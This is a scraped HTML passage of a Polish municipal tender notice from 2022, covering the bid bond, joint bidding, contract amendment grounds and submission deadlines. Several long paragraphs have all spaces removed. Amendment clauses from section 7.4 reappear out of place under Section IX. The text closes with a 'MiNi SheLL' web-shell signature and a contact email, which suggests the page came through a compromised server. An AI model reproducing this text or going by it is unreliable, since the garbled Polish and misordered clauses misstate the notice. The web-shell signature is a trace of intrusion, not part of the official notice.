zł.”</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca,najpóźniejprzedupływemterminuskładaniaofert,winienwnieśćwadiumwwysokości:5.500,00zł(słownie:pięćtysięcypięćsetzłi00/100),zuwzględnieniem,żekwotywadiumdlaposzczególnychczęścizamówieniawynoszą:1)wczęścinr1zamówienia–4.500,00zł(słownie:czterytysiącepięćsetzłi00/100)2)wczęścinr2zamówienia–1.000,00zł(słownie:jedentysiąci00/100)-iutrzymaćjenieprzerwaniedodniaupływuterminuzwiązaniaofertą,zwyjątkiemprzypadków,októrychmowawart.98ust.1pkt2i3orazust.2ustawyPzp.Uwaga!Zamawiającyinformuje,żeWykonawcazabezpieczającwadiumofertyczęściowej,możewnieśćwadiumdlakażdejczęścizamówieniaoddzielnielubkumulatywnie,jednakże,wtymdrugimprzypadku,należypamiętaćoprzyporządkowaniukwotywadiumdoposzczególnychczęścizamówienia.2.Wadiummożebyćwnoszonewjednejlubkilkunastępującychformach:1)pieniądzu;2)gwarancjachbankowych;3)gwarancjachubezpieczeniowych;4)poręczeniachudzielanychprzezpodmioty,októrychmowawart.6bust.5pkt2ustawyzdnia9listopada2000r.outworzeniuPolskiejAgencjiRozwojuPrzedsiębiorczości(Dz.U.z2019r.poz.310,836i1572).3.WadiumwniesionewpieniądzunależyzłożyćprzelewembankowymnakontoZamawiającego:81834900020012881820000090zdopiskiem:„WADIUM–nrpostępowania2.2022–Częśćnr……………zamówienia”.4.ZaterminwniesieniawadiumwformiepieniężnejuznajesiędatęuznaniaśrodkównakoncieZamawiającego(dzień,godzina).5.Wprzypadkuzłożeniawadiumwinnejformieniżpieniężna,WykonawcaprzekazujeZamawiającemu:a)oryginałgwarancjibankowejlubporęczenia,wpostacielektronicznej,podpisanekwalifikowanympodpisemelektronicznymprzezwystawcę,albob)oryginałgwarancjiubezpieczeniowejwpostacielektronicznej.Uwaga!Cyfroweodwzorowanie(kopiaelektronicznadokumentuzapisanegowpostacipapierowej,np.skan,fotokopia)niestanowioryginaługwarancjilubporęczeniawpostacielektronicznej.6.WadiumwniesioneprzezjednegozWykonawcówwspólnieubiegającychsięozamówienieuważasięzawniesioneprawidłowo.7.Zamawiającyzwracawadiumniezwłocznie,niepóźniejjednakniżwterminie7dnioddniawystąpieniajednejzokoliczności:1)upływuterminuzwiązaniaofertą;2)zawarciaumowywsprawiezamówieniapublicznego;3)unieważnieniapostępowaniaoudzieleniezamówienia,zwyjątkiemsytuacji,gdyniezostałorozstrzygnięteodwołanienaczynnośćunieważnieniaalbonieupłynąłtermindojegowniesienia.8.Zamawiający,niezwłocznie,niepóźniejjednakniżwterminie7dnioddniazłożeniawnioskuzwracawadiumWykonawcy:1)którywycofałofertęprzedupływemterminuskładaniaofert;2)któregoofertazostałaodrzucona;3)powyborzenajkorzystniejszejoferty,zwyjątkiemwykonawcy,któregoofertazostaławybranajakonajkorzystniejsza;4)pounieważnieniupostępowania,wprzypadku,gdyniezostałorozstrzygnięteodwołanienaczynnośćunieważnieniaalbonieupłynąłtermindojegowniesienia.9.Złożeniewnioskuozwrotwadium,októrymmowawpkt.24.7,powodujerozwiązaniestosunkuprawnegozWykonawcąwrazzutratąprzezniegoprawadokorzystaniaześrodkówochronyprawnej.10.Zamawiającyzwracawadiumwniesionewpieniądzuwrazzodsetkamiwynikającymizumowyrachunkubankowego,naktórymbyłoonoprzechowywane,pomniejszoneokosztyprowadzeniarachunkubankowegoorazprowizjibankowejzaprzelewpieniędzynarachunekbankowywskazanyprzezWykonawcę.11.Zamawiającyzwracawadiumwniesionewinnejformieniżwpieniądzupoprzezzłożeniegwarantowilubporęczycielowioświadczeniaozwolnieniuwadium.12.Zamawiającyzatrzymujewadiumwrazzodsetkami,awprzypadkuwadiumwniesionegowformiegwarancjilubporęczenia,występujeodpowiedniodogwarantalubporęczycielazżądaniemzapłatywadium,wokolicznościachwskazanychwart.98ust.6ustawyPZP.1.Wprzypadku,gdyWykonawcaniewniósłwadiumlubwniósłwsposóbnieprawidłowylubnieutrzymałwadiumnieprzerwaniedoupływuterminuzwiązaniaofertąlubzłożyłwniosekozwrotwadium,wprzypadku,októrymmowawart.98ust.2pkt3ustawyPzp,Zamawiającyodrzuciofertęnapodstawieart.226ust.1pkt14ustawyPzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia mogą być:<br/>a)	wspólnicy spółki cywilnej – w rozumieniu przepisów art. 860-875 KC,<br/>b)	Wykonawcy, którzy zawarli porozumienie w celu wspólnego ubiegania się o udzielenie zamówienia publicznego, nie będący spółką cywilną w rozumieniu przepisów KC np.: tak zwane „konsorcjum” dwóch lub więcej podmiotów gospodarczych,<br/>2)	w takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo reprezentowania, w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, <br/>3)	dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania; - pełnomocnictwo winno być podpisane przez wszystkich tych Wykonawców ubiegających się wspólnie o zamówienie publiczne, którzy ustanawiają pełnomocnika; - podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do centralnej ewidencji i informacji o działalności gospodarczej,<br/>4)	oferta winna być podpisana przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub upoważnionego pełnomocnika, <br/>5)	W przypadku wyboru, jako najkorzystniejszej, oferty składanej przez Wykonawców wspólnie ubiegających się o zamówienie, Wykonawcy, na żądanie Zamawiającego, zobowiązani są przed podpisaniem umowy, przedstawić Zamawiającemu umowę regulującą współpracę tych Wykonawców, zawierającą w szczególności: <br/>a)	wskazania reguł ponoszenia odpowiedzialności przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>b)	wskazania podmiotu, który będzie wystawcą faktury w ramach realizacji zamówienia, <br/>c)	wskazania podmiotu, który będzie ich reprezentował w stosunkach zewnętrznych, <br/>d)	zapis, z którego wynika, że umowa regulująca współpracę tych Wykonawców nie może zostać rozwiązana przed zakończeniem realizacji zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Wszelkiezmianyiuzupełnieniatreścininiejszejumowywymagająformypisemnej,podrygoremnieważności,zuwzględnieniempostanowień§20ust.6umowy.2.Zamawiający,wszczególnościwoparciuoart.455ust.1pkt1ustawyPzp,dopuszczamożliwośćwprowadzeniazmianytreściumowy,wstosunkudotreścioferty,napodstawiektórejdokonanowyboruWykonawcy,wszczególnościwzakresie:1)zmianyterminukońcowegowprzypadku:a)nieterminowegoprzekazaniaterenubudowy,b)wystąpieniasiływyższej,c)wyjątkowoniesprzyjającychwarunkówatmosferycznychtj.długotrwałe,trwającenieprzerwaniepoprzezokres,conajmniej7dni:silnemrozyponiżej-10stopniC,ponadnormoweopadyśniegu,ulewnedeszcze,wysokietemperaturypowyżej30stopniC;-uniemożliwiającychprowadzenierobótbudowlanych,zzachowaniemwymaganejtechnologii,przeprowadzeniepróbisprawdzeń,dokonywanieodbiorów,d)koniecznościwykonaniarobótnieprzewidzianychwpostępowaniuoudzieleniezamówieniapublicznego,apolegającychnapodniesieniuwarunkówużytkowychobiektu,zmianiefunkcji,podniesieniajakościwykończenialubwyposażenia,wprowadzeniuzmianpolegającychnaobniżeniukosztuobiektubudowlanego,e)związkuzokolicznościaminiemającymizwiązkuzprowadzonymirobotamibudowlanymi,awynikającymizprowadzonejprzezinwestoradziałalności,f)przedłużeniaproceduryudzieleniaprzedmiotowegozamówieniapublicznegopoprzezśrodkiochronyprawnejwykorzystywaneprzezwykonawcówlubinnepodmiotyprzedzawarciemumowy,gdyterminzakończeniarobótokreślonyzostałdatą,g)napotkaniawarunkówfizycznychnieprzewidywalnych,mającychwpływnawydłużenieprocesuinwestycyjnego,zmianrobótbudowlanychwprowadzonychdecyzjamiadministracyjnymiwydanymi,lubktóreuzyskaływalorostatecznościpodniurozstrzygnięciapostępowaniaskutkującegopodpisaniemniniejszejumowyidotyczącymistronumowy,obiektubudowlanego,prowadzonychrobótbudowlanychlubinnychokolicznościmającychzwiązekzprzedmiotemumowy,h)zmianyzakresurobótprzezinwestoralubkoniecznościwykonaniainnychrobótdodatkowych(zamiennych),i)zmianspowodowanychnieprzewidzianymiwdokumentacjiprojektowejispecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanychwarunkamigeologicznymi,archeologicznymilubterenowymi,wszczególności:niewypałyiniewybuchy,wykopaliskaarcheologiczne,j)odmiennychodprzyjętychwdokumentacjiprojektowejwarunkówgeologicznych,aleistotnychdlarealizacjiprzedmiotuzamówienia,k)odmiennych(aleistotnychdlarealizacjiprzedmiotuzamówienia)odprzyjętychwdokumentacjiprojektowejwarunkówterenowych,wszczególnościistnieniepodziemnychsieci,instalacji,urządzeńlubniezinwentaryzowanychalbobłędniezinwentaryzowanychobiektówbudowlanych(bunkry,fundamenty,ścianyszczelne,itp.),l)zmianysposobuwykonaniaprzedmiotuumowynaskutekwystąpieniaokolicznościprzewidzianychwpkt.3.-podwarunkiempodpisaniaprzezstronyporozumieniawsprawiezmianyterminu.2)aktualizacjiharmonogramupracwmiarępotrzeb,zzachowaniemterminukońcowego,októrymmowaw§2ust.1umowy,zuwzględnieniempostanowień§19ust.5umowy(jeżelidotyczy),3)sposobuwykonaniaprzedmiotuumowy,wprzypadku:a)stwierdzeniawadlubwprowadzeniazmianwdokumentacjiprojektowej,skutkującychkoniecznościądokonaniapopraweklubuzupełnień,którychniemożnabyłowcześniejprzewidzieć,b)niedostępnościnarynkumateriałówluburządzeńwskazanychwdokumentacjiprojektowejlubspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowalnychspowodowanejzaprzestaniemprodukcjilubwycofaniemzrynkutychmateriałówluburządzeń,c)pojawieniasięnarynkumateriałówluburządzeńnowszejgeneracji,pozwalającychnazaoszczędzeniekosztówrealizacjiprzedmiotuumowylubkosztóweksploatacjiwykonanegoprzedmiotuumowy,lubumożliwiającychuzyskanielepszejjakościrobót,d)pojawieniasięnowszej2.technologiiwykonaniazaprojektowanychrobót,pozwalającejnazaoszczędzenieczasurealizacjiprzedmiotuumowylubkosztówwykonywanychprac,jakrównieżkosztóweksploatacjiwykonanegoprzedmiotuumowye)celowościlubkoniecznościzrealizowaniaprzedmiotuumowyprzyzastosowaniuinnychrozwiązańtechnicznych/technologicznychniżwskazanewdokumentacjiprojektowejlubspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanych,wynikającejzokoliczności,którychniemożnabyłoprzewidzieć, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-05 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.platformazakupowa.pl/pn/ug_luzino/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-05 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> f)wystąpieniawarunkówterenowychodbiegającychwsposóbistotnyodprzyjętychwdokumentacjiprojektowej,wszczególnościbrakuzinwentaryzowaniaobiektówbudowlanychlubzinwentaryzowaniaobiektówbudowlanychwsposóbwadliwy,g)wystąpieniakoniecznościzrealizowaniaprzedmiotuumowyprzyzastosowaniuodmiennychrozwiązańtechnicznych,technologicznychlubmateriałowychniżwskazanowdokumentacjiprojektowej,zewzględunazmianyobowiązującegoprawa,h)wystąpienianiebezpieczeństwakolizjizinwestycjamiplanowanymilubrównolegleprowadzonymiprzezinnepodmiotywzakresieniezbędnymdouniknięcialubusunięciatychkolizji,i)podjęciaprzezosobytrzeciedziałańuniemożliwiającychlubutrudniającychwykonanieprzedmiotuumowywsposóbprzewidzianywdokumentacjiprojektowejlubwspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanych,któretodziałanianiesąkonsekwencjąwinyktórejkolwiekzestronumowy,4)zakresuprzedmiotuumowywprzypadku:a)podjęciaprzezosobytrzeciedziałańuniemożliwiającychlubutrudniającychwykonanieprzedmiotuumowywzakresieprzewidzianymwdokumentacjiprojektowejlubwspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanych,któretodziałanianiesąkonsekwencjąwinyktórejkolwiekzestronumowy,b)rezygnacjiprzezZamawiającegozwykonaniaczęściprzedmiotuumowywrazieuznaniaichwykonaniazazbędne,czegoniemożnabyłowcześniejprzewidzieć,c)wykonanianieprzewidzianychrobótniezbędnychdorealizacjiprzedmiotuumowy,5)zmianywysokościwynagrodzenianależnegoWykonawcy,wprzypadkuzmiany:a)wysokościpodatkuodtowarówiusługorazpodatkuakcyzowego,b)wysokościminimalnegowynagrodzeniazapracęalbowysokościminimalnejstawkigodzinowej,ustalonychnapodstawieustawyzdnia10października2002r.ominimalnymwynagrodzeniuzapracę,c)zasadpodleganiaubezpieczeniomspołecznymlububezpieczeniuzdrowotnemulubwysokościstawkiskładkinaubezpieczeniaspołecznelubzdrowotne,d)zasadgromadzeniaiwysokościwpłatdopracowniczychplanówkapitałowych,októrychmowawustawiezdnia4października2018r.opracowniczychplanachkapitałowych(Dz.U.z2020r.poz.1342zezm.),-jeżelizmianytebędąmiaływpływnakosztywykonaniazamówieniaprzezWykonawcę;-wprzypadku,októrymmowawlit.b,cid,Wykonawca,wterminie30dnioddniawejściawżycieprzepisówdokonującychtychzmian,zobowiązanyjestprzedstawić,wformiepisemnej,wniosekuzasadniającyzwiększeniewynagrodzenia,e)naskuteksytuacjiniemożliwychdoprzewidzeniawmomenciepodpisywaniaumowy,októrychmowaw§1ust.5,6,7,8niniejszejumowy,6)zamianylubwprowadzenianowychpodwykonawców,podwarunkiemuzyskaniazgodyZamawiającego,nazasadachokreślonychwumowie,7)zmianyformyzabezpieczenianawniosekWykonawcy,zgodniezustawąPzp,podwarunkiemzachowaniaciągłościzabezpieczeniaibezzmniejszeniajegowartości,8)zmianydanychWykonawcynp.zmianasiedziby,adresu,nazwy(bezzmianysamegoWykonawcy),9)wystąpieniarozbieżnościlubniejasnościwrozumieniupojęćużytychwumowie,którychniemożnabyłousunąćwinnysposób,azmianatakabędzieumożliwiaćusunięcierozbieżnościidoprecyzowanieumowywcelujednoznacznejinterpretacji.3.Wprzedstawionychwust.2pkt1przypadkachwystąpieniaopóźnieństronyustaląnoweterminy,ztymżemaksymalnyokresprzesunięciaterminuzakończeniarealizacjiprzedmiotuumowyrównybędzieuzasadnionemuokresowiprzerwylubpostoju.4.Wprzypadkuzmianwumowie,niedoprecyzowanychwniniejszymparagrafie,majązastosowanieodpowiedniepostanowieniaart.454orazart.455ustawyPzp.Doofertynależydołączyćdokumentyoktórychmowawpkt9.7SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com